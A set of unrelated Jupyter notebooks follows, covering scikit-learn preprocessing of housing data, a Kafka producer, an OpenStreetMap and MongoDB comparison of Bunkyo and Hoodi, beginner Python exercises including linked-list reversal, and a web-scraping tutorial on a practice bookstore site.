ord_cols = ['ExterQual', 'ExterCond', 'HeatingQC',
'KitchenQual', 'Functional', 'FireplaceQu']
pass_cols = ['OverallQual', 'OverallCond']
bin_cols = ['CentralAir']
drop_feats = ['Unnamed: 0', 'Id']
# -
X_train['CentralAir']
# +
# Sorting Ordinal Columns
std_grading = ['Po', 'Fa', 'TA', 'Gd', 'Ex']
function_grading = ['Typ', 'Min1', 'Min2', 'Mod', 'Maj1', 'Maj2', 'Sev', 'Sal']
fire_grading = ['no_fireplace'] + std_grading
ordinates = std_grading, std_grading, std_grading, std_grading, function_grading, fire_grading
ordinates
# -
# ### Steps to take here
#
# 1. Scale numeric columns
# 2. One-hot encode categorical columns
# 3. create ordinate for ordinal categories
# 4. create binary features
# 5. pass through o
# +
from sklearn.compose import ColumnTransformer, make_column_transformer
# Classifiers
from sklearn.dummy import DummyClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.impute import SimpleImputer
# classifiers / models
from sklearn.linear_model import LogisticRegression
# other
from sklearn.model_selection import (
GridSearchCV,
RandomizedSearchCV,
cross_val_score,
cross_validate,
train_test_split,
)
from sklearn.pipeline import Pipeline, make_pipeline
from sklearn.preprocessing import OneHotEncoder, OrdinalEncoder, StandardScaler
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeRegressor, export_graphviz
from sklearn.dummy import DummyClassifier, DummyRegressor
# -
preprocessor = make_column_transformer(
(StandardScaler(), num_cols),
(OrdinalEncoder(categories=ordinates), ord_cols),
(OneHotEncoder(handle_unknown="ignore", sparse=False), cat_cols),
(OneHotEncoder(drop='if_binary', sparse=False), bin_cols),
#(passthrough, pass_cols)
)
preprocessor.named_transformers_
transfeat_names = num_cols + ord_cols + list(preprocessor.named_transformers_['onehotencoder-1'].get_feature_names()) + list(preprocessor.named_transformers_['onehotencoder-2'].get_feature_names())
X = preprocessor.fit_transform(X_train)
pd.DataFrame(X, columns=transfeat_names)
pipe = make_pipeline(preprocessor, DummyRegressor())
pipe.fit(X_train, y_train)
pipe.score(X_valid, y_valid)
pipe = make_pipeline(preprocessor, RidgeCV())
pipe.fit(X_train, y_train)
pipe.score(X_valid, y_valid)
|
Preprocess.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Kafka Producer
# !pip install Faker
import random
import time
import json
from faker import Faker
from kafka import KafkaProducer
from kafka.errors import KafkaError
from IPython.display import clear_output
producer = KafkaProducer(
bootstrap_servers=['kafka-headless.data:9092'],
value_serializer=lambda m: json.dumps(m).encode('utf-8')
)
# Create 10 fake device ids.
fake = Faker()
device = [fake.mac_address() for i in range(10)]
# Send 100 sets of random metrics to Kafka using the 10 fake device ids.
# Pause for 1 second between messages.
for i in range(100):
msg = {
'device': device[random.randrange(1,10)],
'sensor1': random.randrange(1,10),
'sensor2': random.randrange(100,10000),
}
producer.send('metrics', msg)
clear_output(wait=True)
print(f'Sent message {(i+1):03d}: \n{json.dumps(msg, indent=2)}')
time.sleep(1)
|
20-KafkaProducer.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# This is an example Jupyter notebook in Drake to be run from Bazel.
# +
import ipywidgets as widgets
import numpy as np
from drake.tools.jupyter.example_library import my_func
# -
np.array([1, 2, 3])
assert my_func() == "Hello"
widgets.IntSlider()
|
tools/jupyter/example.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [default]
# language: python
# name: python2
# ---
# # **P3 - Data Wrangling with MongoDB**
# # **OpenStreetMap Project Data Wrangling with MongoDB**
# ## <NAME><a name="top"></a>
# Data used -<a href=https://mapzen.com/metro-extracts/> MapZen Weekly OpenStreetMaps Metro Extracts</a>
#
#
# Map Areas:
# These two maps are selected since ,right now i am living at Hoodi,Bengaluru. And my dream is to do my masters in japan in robotics,so i had selected locality of University of tokyo, Bunkyo.I really wanted to explore differences between the regions.
#
#
# - <a href=https://mapzen.com/data/metro-extracts/your-extracts/fdd7c4ef0518> Bonkyu,Tokyo,Japan. </a>
# - <a href=https://mapzen.com/data/metro-extracts/your-extracts/c1f2842408ac> Hoodi,Bengaluru,india </a>
#
# Working Code :
# - <a href=https://mapzen.com/data/metro-extracts/your-extracts/fdd7c4ef0518> Bonkyu,Tokyo,Japan. </a>
#
#
# <hr>
# 1. [Problems Encountered in the Map](#problems)
# - [Filtering Different Language names](#Language)
# - [Over-abbreviated Names](#abbr)
# - [Merging both cities](#combine_cities)
# 2. [Data Overview](#data_overview)
# 3. [Additional Data Exploration using MongoDB](#exploration)
# 4. [Conclusion](#conclusion)
# <hr>
# <h2><a name="problems"></a> **1. Problems Encountered**</h2>
#
# - Some of names were in different Languages so ,i had to filter out them and select english names for both maps Hoodi and Bunkyo
# - Street names with different types of abbreviations. (i.e. 'Clark Ave SE' or 'Eubank Northeast Ste E-18')
# - Two cities have to be accessed from one database
# ### Names in Different Language<a name="Language"></a>
# Different regions have different languages ,and we find that someof names were in different language which are filltered to get only english names.
# Which would check weather the charecters belong to ascii or not
#
def isEnglish(string):
try:
string.encode('ascii')
except UnicodeEncodeError:
return False
else:
return True
# <hr>
# ### **Over-abbreviated Names**<a name="abbr"></a>
#
# Since the most of data being manually uploaded, there are lot of abbreviations in street names,locality names.
# Where they are filtered and replaced with full names.
#
#
#the city below can be hoodi or bunkyo
for st_type, ways in city_types.iteritems():
for name in ways:
better_name = update_name(name, mapping)
if name != better_name:
print name, "=>", better_name
# +
#few examples
Bunkyo:
Meidai Jr. High Sch. => Meidai Junior High School
St. Mary's Cathedral => Saint Mary's Cathedral
Shinryukei brdg. E. => Shinryukei Bridge East
Iidabashi Sta. E. => Iidabashi Station East
...
Hoodi:
St. Thomas School => Saint Thomas School
Opp. Jagrithi Apartment => Opposite Jagrithi Apartment
...
# -
# <hr>
# ### **Merging Both cities**<a name="combine_cities"></a>
# These two maps are selected since ,right now i am living at Hoodi,Bengaluru. And one day i want do my masters in japan in robotics,so i had selected locality of University of tokyo, Bunkyo.I really wanted to explore differences between the regions.
#
# I need to add a tag named "city" so i can differentiate them from the database.
# <hr>
# ## **2. Data Overview**<a name="data_overview"></a>
# This section contains basic statistics about the dataset and the MongoDB queries used to gather them.
# ### **File Sizes**
bangalore.osm -40MB
bangalore.osm.json-51MB
tokyo1.osm- 82MB
tokyo1.osm.json-102.351MB
# #### **Number of documents**
print "Bunkyo:",mongo_db.cities.find({'city':'bunkyo'}).count()
print "Hoodi:",mongo_db.cities.find({'city':'hoodi'}).count()
# - Bunkyo: 1268292
# - Hoodi: 667842
# #### **Number of node nodes.**
print "Bunkyo:",mongo_db.cities.find({"type":"node",
'city':'bunkyo'}).count()
print "Hoodi:",mongo_db.cities.find({"type":"node",
'city':'hoodi'}).count()
Bunkyo: 1051170
Hoodi: 548862
# #### **Number of way nodes.**
print "Bunkyo:",mongo_db.cities.find({'type':'way',
'city':'bunkyo'}).count()
print "Hoodi:",mongo_db.cities.find({'type':'way',
'city':'hoodi'}).count()
Bunkyo: 217122
Hoodi: 118980
# #### **Total Number of contributor.**
print "Constributors:", len(mongo_db.cities.distinct("created.user"))
Contributors: 858
# <hr>
# ## **3. Additional Data Exploration using MongoDB**<a name="exploration"></a>
# I am going to use the pipeline function to retrive data from the database
def pipeline(city):
p= [{"$match":{"created.user":{"$exists":1},
"city":city}},
{"$group": {"_id": {"City":"$city",
"User":"$created.user"},
"contribution": {"$sum": 1}}},
{"$project": {'_id':0,
"City":"$_id.City",
"User_Name":"$_id.User",
"Total_contribution":"$contribution"}},
{"$sort": {"Total_contribution": -1}},
{"$limit" : 5 }]
return p
result1 =mongo_db["cities"].aggregate(pipeline('bunkyo'))
for each in result1:
print(each)
print("\n")
result2 =mongo_db["cities"].aggregate(pipeline('hoodi'))
for each in result2:
print(each)
# + active=""
# Bunkyo:
# {u'City': u'bunkyo', u'User_Name': u'kurauchi', u'Total_contribution': 667425}
# {u'City': u'bunkyo', u'User_Name': u'watao', u'Total_contribution': 216855}
# {u'City': u'bunkyo', u'User_Name': u'higa4', u'Total_contribution': 40845}
# {u'City': u'bunkyo', u'User_Name': u'ikiya', u'Total_contribution': 37287}
# {u'City': u'bunkyo', u'User_Name': u'javbw', u'Total_contribution': 26655}
#
# Hoodi:
# {u'City': u'hoodi', u'User_Name': u'praveeng', u'Total_contribution': 75153}
# {u'City': u'hoodi', u'User_Name': u'akhilsai', u'Total_contribution': 70509}
# {u'City': u'hoodi', u'User_Name': u'anthony1', u'Total_contribution': 52194}
# {u'City': u'hoodi', u'User_Name': u'anushapyata', u'Total_contribution': 45540}
# {u'City': u'hoodi', u'User_Name': u'docaneesh', u'Total_contribution': 38703}
# -
# The top contributors for hoodi are no where near since bunkyo being a more compact region than hoodi ,there are more places to contribute.
# <hr>
# ### To get the top Amenities in Hoodi and Bunkyo
# I will be showing the pipeline that will go in the above mentioned "Pipleline" function
pipeline=[{"$match":{"Additional Information.amenity":{"$exists":1},
"city":city}},
{"$group": {"_id": {"City":"$city",
"Amenity":"$Additional Information.amenity"},
"count": {"$sum": 1}}},
{"$project": {'_id':0,
"City":"$_id.City",
"Amenity":"$_id.Amenity",
"Count":"$count"}},
{"$sort": {"Count": -1}},
{"$limit" : 10 }]
# + active=""
# Bunkyo:
# {u'Count': 1587, u'City': u'bunkyo', u'Amenity': u'parking'}
# {u'Count': 1497, u'City': u'bunkyo', u'Amenity': u'restaurant'}
# {u'Count': 933, u'City': u'bunkyo', u'Amenity': u'cafe'}
# {u'Count': 792, u'City': u'bunkyo', u'Amenity': u'fast_food'}
# {u'Count': 723, u'City': u'bunkyo', u'Amenity': u'school'}
# {u'Count': 606, u'City': u'bunkyo', u'Amenity': u'place_of_worship'}
# {u'Count': 525, u'City': u'bunkyo', u'Amenity': u'vending_machine'}
# {u'Count': 507, u'City': u'bunkyo', u'Amenity': u'bench'}
# {u'Count': 354, u'City': u'bunkyo', u'Amenity': u'pub'}
# {u'Count': 342, u'City': u'bunkyo', u'Amenity': u'kindergarten'}
#
# Hoodi:
# {u'Count': 528, u'City': u'hoodi', u'Amenity': u'restaurant'}
# {u'Count': 216, u'City': u'hoodi', u'Amenity': u'school'}
# {u'Count': 189, u'City': u'hoodi', u'Amenity': u'atm'}
# {u'Count': 162, u'City': u'hoodi', u'Amenity': u'pharmacy'}
# {u'Count': 162, u'City': u'hoodi', u'Amenity': u'parking'}
# {u'Count': 162, u'City': u'hoodi', u'Amenity': u'place_of_worship'}
# {u'Count': 141, u'City': u'hoodi', u'Amenity': u'bank'}
# {u'Count': 141, u'City': u'hoodi', u'Amenity': u'fast_food'}
# {u'Count': 138, u'City': u'hoodi', u'Amenity': u'hospital'}
# {u'Count': 102, u'City': u'hoodi', u'Amenity': u'cafe'}
# -
# ### As compared to hoodi ,bunkyo have few atms,And parking can be commonly found in bunkyo locality
# <hr>
# ### popular places of worship
#
p = [{"$match":{"Additional Information.amenity":{"$exists":1},
"Additional Information.amenity":"place_of_worship",
"city":city}},
{"$group":{"_id": {"City":"$city",
"Religion":"$Additional Information.religion"},
"count":{"$sum":1}}},
{"$project":{"_id":0,
"City":"$_id.City",
"Religion":"$_id.Religion",
"Count":"$count"}},
{"$sort":{"Count":-1}},
{"$limit":6}]
# + active=""
# Bunkyo:
# {u'Count': 303, u'City': u'bunkyo', u'Religion': u'buddhist'}
# {u'Count': 132, u'City': u'bunkyo', u'Religion': u'shinto'}
# {u'Count': 123, u'City': u'bunkyo'}
# {u'Count': 39, u'City': u'bunkyo', u'Religion': u'christian'}
# {u'Count': 3, u'City': u'bunkyo', u'Religion': u'muslim'}
# {u'Count': 3, u'City': u'bunkyo', u'Religion': u'confucian'}
#
# Hoodi:
# {u'Count': 90, u'City': u'hoodi', u'Religion': u'hindu'}
# {u'Count': 30, u'City': u'hoodi', u'Religion': u'christian'}
# {u'Count': 24, u'City': u'hoodi'}
# {u'Count': 18, u'City': u'hoodi', u'Religion': u'muslim'}
# -
# As expected japan is popular with buddism,
#
#
# but india being a secular country it will be having most of the reglious places of worship,where hinduism being majority
# <hr>
# ### popular restaurants
p = [{"$match":{"Additional Information.amenity":{"$exists":1},
"Additional Information.amenity":"restaurant",
"city":city}},
{"$group":{"_id":{"City":"$city",
"Food":"$Additional Information.cuisine"},
"count":{"$sum":1}}},
{"$project":{"_id":0,
"City":"$_id.City",
"Food":"$_id.Food",
"Count":"$count"}},
{"$sort":{"Count":-1}},
{"$limit":6}]
# {u'Count': 582, u'City': u'bunkyo'}
# {u'Food': u'japanese', u'City': u'bunkyo', u'Count': 192}
# {u'Food': u'chinese', u'City': u'bunkyo', u'Count': 126}
# {u'Food': u'italian', u'City': u'bunkyo', u'Count': 69}
# {u'Food': u'indian', u'City': u'bunkyo', u'Count': 63}
# {u'Food': u'sushi', u'City': u'bunkyo', u'Count': 63}
#
#
# {u'Count': 213, u'City': u'hoodi'}
# {u'Food': u'regional', u'City': u'hoodi', u'Count': 75}
# {u'Food': u'indian', u'City': u'hoodi', u'Count': 69}
# {u'Food': u'chinese', u'City': u'hoodi', u'Count': 36}
# {u'Food': u'international', u'City': u'hoodi', u'Count': 24}
# {u'Food': u'Andhra', u'City': u'hoodi', u'Count': 21}
# Indian style cusine in Bunkyo seems famous, Which will be better if i go to japan and do my higher studies there.
# <hr>
# ### popular fast food joints
#
p = [{"$match":{"Additional Information.amenity":{"$exists":1},
"Additional Information.amenity":"fast_food",
"city":city}},
{"$group":{"_id":{"City":"$city",
"Food":"$Additional Information.cuisine"},
"count":{"$sum":1}}},
{"$project":{"_id":0,
"City":"$_id.City",
"Food":"$_id.Food",
"Count":"$count"}},
{"$sort":{"Count":-1}},
{"$limit":6}]
# + active=""
# {u'Count': 246, u'City': u'bunkyo'}
# {u'Food': u'burger', u'City': u'bunkyo', u'Count': 102}
# {u'Food': u'ramen', u'City': u'bunkyo', u'Count': 81}
# {u'Food': u'japanese', u'City': u'bunkyo', u'Count': 54}
# {u'Food': u'noodle', u'City': u'bunkyo', u'Count': 51}
# {u'Food': u'noodle;ramen', u'City': u'bunkyo', u'Count': 33}
#
#
# {u'Count': 66, u'City': u'hoodi'}
# {u'Food': u'pizza', u'City': u'hoodi', u'Count': 21}
# {u'Food': u'indian', u'City': u'hoodi', u'Count': 12}
# {u'Food': u'chicken', u'City': u'hoodi', u'Count': 6}
# {u'Food': u'ice_cream', u'City': u'hoodi', u'Count': 6}
# {u'Food': u'burger', u'City': u'hoodi', u'Count': 6}
# -
# Burger seems very popular among japanese in fast foods,i was expecting ramen to be more popular
#
# , but in hoodi pizza is really common,being a metropolitan city.
# <hr>
# ### ATM's near locality
#
p = [{"$match":{"Additional Information.amenity":{"$exists":1},
"Additional Information.amenity":"atm",
"city":city}},
{"$group":{"_id":{"City":"$city",
"Name":"$Additional Information.name:en"},
"count":{"$sum":1}}},
{"$project":{"_id":0,
"City":"$_id.City",
"Name":"$_id.Name",
"Count":"$count"}},
{"$sort":{"Count":-1}},
{"$limit":4}]
# + active=""
# {u'Count': 75, u'City': u'bunkyo'}
# {u'Count': 6, u'City': u'bunkyo', u'Name': u'JP Bank'}
# {u'Count': 6, u'City': u'bunkyo', u'Name': u'Mizuho'}
#
#
# {u'Count': 177, u'City': u'hoodi'}
# {u'Count': 3, u'City': u'hoodi', u'Name': u'Axis bank ATM'}
# {u'Count': 3, u'City': u'hoodi', u'Name': u'HDFC'}
# {u'Count': 3, u'City': u'hoodi', u'Name': u'Canara'}
# {u'Count': 3, u'City': u'hoodi', u'Name': u'State bank ATM'}
#
# -
# There are quite a few ATM in Bunkyo as compared to hoodi
# <hr>
# ### Martial arts or Dojo Center near locality
#
# +
## Martial arts or Dojo Center near locality
import re
pat = re.compile(r'dojo', re.I)
d=mongo_db.cities.aggregate([{"$match":{ "$or": [ { "Additional Information.name": {'$regex': pat}}
,{"Additional Information.amenity": {'$regex': pat}}]}}
,{"$group":{"_id":{"City":"$city"
, "Sport":"$Additional Information.name"}}}])
for each in d:
print(each)
# +
bunkyo:
{u'_id': {u'City': u'bunkyo', u'Sport': u'Aikikai Hombu Dojo'}}
{u'_id': {u'City': u'bunkyo', u'Sport': u'Kodokan Dojo'}}
hoodi:
{u'_id': {u'City': u'hoodi', u'Sport': u"M S Gurukkal's Kalari Academy"}}
# -
# I wanted to learn martial arts ,
# In japan is known for its akido and other ninjistsu martial arts , where i can find some in bunkyo
# Where as in hoodi,india Kalaripayattu Martial Arts are one of the ancient arts that ever existed.
# <hr>
# ### most popular shops.
#
p = [{"$match":{"Additional Information.shop":{"$exists":1},
"city":city}},
{"$group":{"_id":{"City":"$city",
"Shop":"$Additional Information.shop"},
"count":{"$sum":1}}},
{"$project": {'_id':0,
"City":"$_id.City",
"Shop":"$_id.Shop",
"Count":"$count"}},
{"$sort":{"Count":-1}},
{"$limit":10}]
# +
{u'Shop': u'convenience', u'City': u'bunkyo', u'Count': 1035}
{u'Shop': u'clothes', u'City': u'bunkyo', u'Count': 282}
{u'Shop': u'books', u'City': u'bunkyo', u'Count': 225}
{u'Shop': u'mobile_phone', u'City': u'bunkyo', u'Count': 186}
{u'Shop': u'confectionery', u'City': u'bunkyo', u'Count': 156}
{u'Shop': u'supermarket', u'City': u'bunkyo', u'Count': 150}
{u'Shop': u'computer', u'City': u'bunkyo', u'Count': 126}
{u'Shop': u'hairdresser', u'City': u'bunkyo', u'Count': 90}
{u'Shop': u'electronics', u'City': u'bunkyo', u'Count': 90}
{u'Shop': u'anime', u'City': u'bunkyo', u'Count': 90}
{u'Shop': u'clothes', u'City': u'hoodi', u'Count': 342}
{u'Shop': u'supermarket', u'City': u'hoodi', u'Count': 129}
{u'Shop': u'bakery', u'City': u'hoodi', u'Count': 120}
{u'Shop': u'shoes', u'City': u'hoodi', u'Count': 72}
{u'Shop': u'furniture', u'City': u'hoodi', u'Count': 72}
{u'Shop': u'sports', u'City': u'hoodi', u'Count': 66}
{u'Shop': u'electronics', u'City': u'hoodi', u'Count': 60}
{u'Shop': u'beauty', u'City': u'hoodi', u'Count': 54}
{u'Shop': u'car', u'City': u'hoodi', u'Count': 36}
{u'Shop': u'convenience', u'City': u'hoodi', u'Count': 36}
# -
The general stores are quite common in both the places
# ### most popular supermarkets
#
p = [{"$match":{"Additional Information.shop":{"$exists":1},
"city":city,
"Additional Information.shop":"supermarket"}},
{"$group":{"_id":{"City":"$city",
"Supermarket":"$Additional Information.name"},
"count":{"$sum":1}}},
{"$project": {'_id':0,
"City":"$_id.City",
"Supermarket":"$_id.Supermarket",
"Count":"$count"}},
{"$sort":{"Count":-1}},
{"$limit":5}]
# +
{u'Count': 120, u'City': u'bunkyo'}
{u'Count': 9, u'City': u'bunkyo', u'Supermarket': u'Maruetsu'}
{u'Count': 3, u'City': u'bunkyo', u'Supermarket': u"Y's Mart"}
{u'Count': 3, u'City': u'bunkyo', u'Supermarket': u'SainE'}
{u'Count': 3, u'City': u'bunkyo', u'Supermarket': u'DAIMARU Peacock'}
{u'Count': 9, u'City': u'hoodi', u'Supermarket': u'Reliance Fresh'}
{u'Count': 9, u'City': u'hoodi'}
{u'Count': 6, u'City': u'hoodi', u'Supermarket': u"Nilgiri's"}
{u'Count': 3, u'City': u'hoodi', u'Supermarket': u'Royal Mart Supermarket'}
{u'Count': 3, u'City': u'hoodi', u'Supermarket': u'Safal'}
# -
# These are few common supermarket brands in both the cities
# And Nilgiris is like 500 meters away from my home.
# <hr>
# ## **4. Conclusion**<a name="conclusion"></a>
# After such a investigation on this data i think i have become familiar with bunkyo region.
#
# I was expecting a difficulty in merging both the cities data into a single database ,but seem a simple key like city could differentiate them.
#
# There might be even robust cleaning algorithms to a better and clean database,as most of the data is from gps that goes into OpenStreetMap.org. Which needed to be regularly cleaned.
#
# From the comparision of both the cities these are qiute similar and bunkyo region interests me even more to pursue higher studies.
# <hr>
|
P3 wrangle_data/.ipynb_checkpoints/DataWrangling_ganga-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Linked List Reversal
#
# ## Problem
#
# Write a function to reverse a Linked List in place. The function will take in the head of the list as input and return the new head of the list.
#
# You are given the example Linked List Node class:
class Node(object):
def __init__(self,value):
self.value = value
self.nextnode = None
# # Solution
#
# Fill out your solution below:
def reverse(head):
cur = head
pre, nxt = None, None
while cur:# watch out
nxt = cur.nextnode
cur.nextnode = pre
pre = cur
cur = nxt
return pre #watch out
pass
# # Test Your Solution
#
# **Note, this isn't a classic run cell for testing your solution, please read the statements below carefully**
#
# You should be able to easily test your own solution to make sure it works. Given the short list a,b,c,d with values 1,2,3,4. Check the effect of your reverse function and make sure the results match the logic here below:
# +
# Create a list of 4 nodes
a = Node(1)
b = Node(2)
c = Node(3)
d = Node(4)
# Set up order a,b,c,d with values 1,2,3,4
a.nextnode = b
b.nextnode = c
c.nextnode = d
# -
# Now let's check the values of the nodes coming after a, b and c:
print (a.nextnode.value)
print (b.nextnode.value)
print (c.nextnode.value)
d.nextnode.value
# So far so good. Note how there is no value proceeding the last node, this makes sense! Now let's reverse the linked list, we should see the opposite order of values!
reverse(a)
print (d.nextnode.value)
print (c.nextnode.value)
print (b.nextnode.value)
print a.nextnode.value # This will give an error since it now points to None
# Great, now we can see that each of the values points to its previous value (although now that the linked list is reversed we can see the ordering has also reversed)
#
# ## Good Job!
|
code/algorithms/course_udemy_1/Linked Lists/Problems - PRACTICE/Linked List Reversal .ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# #### Задача 1.
# ##### Даны два целых числа A и В. Выведите все числа от A до B включительно,
# #### в порядке возрастания, если A < B, или в порядке убывания в противном случае.
# **Вход:**
#
# 1
# 10
#
# **Выход:**
#
# 1 2 3 4 5 6 7 8 9 10
#
#
# **Вход:**
#
# 10
# 1
#
# **Выход:**
#
# 10 9 8 7 6 5 4 3 2 1
A = int(input())
B = int(input())
if A < B:
# lst1 = [i for i in range(A,B+1)]
print(*range(A,B+1))
else:
# lst2 = [i for i in range(A,B-1,-1)]
print(*range(A,B-1,-1))
# #### Задача 2.
# #### Дано несколько чисел. Посчитайте, сколько из них равны нулю, и выведите это количество.
# **Вход:**
#
# 5 0 7 0 2 2
#
# **Выход:**
#
# 2
#
# +
lst = map(int, input().split())
cnt = 0
for x in lst:
if x == 0:
cnt += 1
print(cnt)
# -
lst = map(int, input().split())
lst = [x for x in lst if x == 0]
print(len(lst))
# #### Задача 3.
# ### Найдите и выведите все двузначные числа, которые равны удвоенному произведению своих цифр.
print(*[x for x in range(10, 100) if x == (x // 10) * (x % 10) * 2])
# #### Задача 4.
# По данному натуральном n вычислите сумму $1!+2!+3!+...+n!$. В решении этой задачи можно использовать только один цикл.
# *Тест1*
# **Вход:**
#
# 1
#
# **Выход:**
#
# 1
#
#
#
# *Тест2*
# **Вход:**
#
# 2
#
# **Выход:**
#
# 3
#
#
#
#
#
# *Тест3*
# **Вход:**
#
# 3
#
# **Выход:**
#
# 9
#
# +
n = int(input())
s = 0
fact = 1
for x in range(1,n+1):
fact *= x
s += fact
print(fact, s)
# -
# **Задача 5**. Найдите максимальный элемент и его позицию в последовательности чисел, записанных через пробел.
# +
spisok = list(map(int, input().split()))
mx = spisok[0]
max_i = 0
for i, x in enumerate(spisok):
if x > mx:
mx = x
max_i = i
print(mx, max_i)
# -
# #### Задача 6.
# Дано целое положительное число N. Составьте таблицу умножения для чисел от 2 до N включительно.
# **Вход:**
#
# 4
#
# **Выход:**
#
# 2*1=2
# 2*2=4
# 2*3=6
# 2*4=8
# 2*5=10
# 2*6=12
# 2*7=14
# 2*8=16
# 2*9=18
# 2*10=20
#
# 3*1=3
# 3*2=6
# 3*3=9
# 3*4=12
# 3*5=15
# 3*6=18
# 3*7=21
# 3*8=24
# 3*9=27
# 3*10=30
#
# 4*1=4
# 4*2=8
# 4*3=12
# 4*4=16
# 4*5=20
# 4*6=24
# 4*7=28
# 4*8=32
# 4*9=36
# 4*10=40
#
# +
n = int(input())
for x in range(2,n+1):
for y in range(1,11):
print(f'{x}*{y}={x*y}')
print()
# -
s = '[]()[[[[(((())))]]]]{{[()]}}'
def check_sequence(s):
return True or False
lst = s[0]
i = 1
while i < len(s):
if s[i] == '[' or s[i] == '(' s[i] == '{':
append.lst(s[i])
elif
i += 1
print (s)
# +
s = '[]()[[[[(((())))]]]]{{[()]}}'
def check_sequence(s):
return True or False
my_stack = []
my_dict = {'}':'{', ')':'(', ']':'['}
for symbol in my_dict.values():
my_stack.append(symbol)
else:
if len(my_stack) > 0 and my_stack[-1] == my_dict[symbol]:
my_stack.pop()
else:
return False
if len(my_stack) == 0:
return True
else:
return False
check_sequence(s)
# -
# Библиотека Scrapy
# +
s = '[]()[[[[(((())))]]]]{{[()]}}'
def check_seq(s):
my_stack = list()
my_dict = {'}':'{', ']':'[', ')':'('}
for symbol in s:
if symbol in my_dict.values():
my_stack.append(symbol)
else:
if len(my_stack) > 0 and my_stack[-1] == my_dict[symbol]:
my_stack.pop()
else:
return False
if len(my_stack) == 0:
return True
else:
return False
check_seq(s)
# -
|
for_tasks_solved.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Introduction to web scraping with python
# [source](https://dev.to/lewiskori/introduction-to-web-scraping-with-python-24li)
# ## What is web scraping?
#
# This is the process of extracting information from a webpage by taking advantage of patterns in the web page's underlying code.
#
# We can use web scraping to gather unstructured data from the internet, process it and store it in a structured format.
#
# In this walkthrough, we'll be storing our data in a JSON file.
# ## Alternatives to web scraping
#
# Though web scraping is a useful tool in extracting data from a website, it's not the only means to achieve this task.
#
# Before starting to web scrape, find out if the page you seek to extract data from provides an API.
# ## robots.txt file
#
# Ensure that you check the robots.txt file of a website before making your scrapper. This file tells if the website allows scraping or if they do not.
#
# To check for the file, simply type the base URL followed by "/robots.txt"
# An example is, "mysite.com/robots.txt".
#
# For more about robots.txt files click [here](https://varvy.com/robottxt.html).
# ## Getting started
#
# In this tutorial, we'll be extracting data from [books to scrape](http://books.toscrape.com/) which you can use to practise your web scraping.
#
# We'll extract the title, rating, link to more information about the book and the cover image of the book. Code can be found on [GitHub](https://github.com/lewis-kori/webcrawler-tutorial).
# ### Importing libraries
#
# The python libraries perform the following tasks.
#
# * requests - will be used to make Http requests to the webpage.
# * json - we'll use this to store the extracted information to a JSON file.
# * BeautifulSoup - for parsing HTML.
import requests
import json
from bs4 import BeautifulSoup
# ### walkthrough
#
# We're initializing three variables here.
#
# * header-HTTP headers provide additional parameters to HTTP transactions. By sending the appropriate HTTP headers, one can access the response data in a different format.
# * base_url - is the webpage we want to scrape since we'll be needing the URL quite often, it's good to have a single initialization and reuse this variable going forward.
# * r - this is the response object returned by the get method. Here, we pass the base_url and header as parameters.
# +
header = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7'}
base_url = "http://books.toscrape.com/"
r = requests.get(base_url, headers=header)
# -
# To ensure our scraper runs when the http response is ok we'll use the if statement as a check. The number 200 is the status code for Ok. To get a list of all codes and their meanings [check out this resource](https://www.restapitutorial.com/httpstatuscodes.html).
#
# We'll then parse the response object using the BeautifulSoup method and store the new object to a variable called soup.
if r.status_code == 200:
soup = BeautifulSoup(r.text, 'html.parser')
books = soup.find_all('li',attrs={"class":"col-xs-6 col-sm-4 col-md-3 col-lg-3"})
result=[]
for book in books:
title=book.find('h3').text
link=base_url +book.find('a')['href']
stars = str(len(book.find_all('i',attrs= {"class":"icon-star"}))) + " out of 5"
price="$"+book.find('p',attrs={'class':'price_color'}).text[2:]
picture = base_url + book.find('img')['src']
single ={'title':title,'stars':stars,'price':price,'link':link,'picture':picture}
result.append(single)
with open('books.json','w') as f:
json.dump(result,f,indent=4)
else:
print(r.status_code)
# +
import pandas as pd
df = pd.read_json('books.json')
df.head()
# -
# Let's take a look at a single record from our webpage to identify the patterns. Once we can see the page, we'll loop through every record in the page as they contain similar traits.
#
# 
# From the image above, we'll notice that all books are contained within a list item with the class.
#
# ```
# col-xs-6 col-sm-4 col-md-3 col-lg-3
# ```
#
# By using the ```find_all()``` method, we can find all references of this HTML tag in the webpage. we pass the tag as the first argument and then using the attrs argument which takes in a python dictionary, we can specify attributes of the HTML tag selected. In this case, it was a class indicated above, but you can even use id as an attribute.
#
# Store the result in a variable, I chose the name books.
title = book.find('h3').text
link = base_url + book.find('a')['href']
# If we observe keenly, we'll notice that each of the elements we want to extract is nested within the list item tag are all contained in similar tags, in the example above. The title of the book is between ```h3``` tags.
#
# The ```find()``` method returns the first matching tag.
#
# ```text``` will simply return any text found within the tags specified.
#
# For the anchor tags, we'll be extracting the hyper reference link.
#
# As opposed to ```h3``` tag, the ```href``` element is within anchor tags in HTML. Like so:
#
# ```html
# <a href="somelink.com"></a>
# ```
#
# In this case, the returned object will behave like a dictionary where we have a
#
# ```
# dictionary_name[key]
# ```
#
# We do this iteratively for all the values we seek to extract because we are taking advantage of the pattern in the underlying code of the webpage. Hence the use of the python for loop.
#
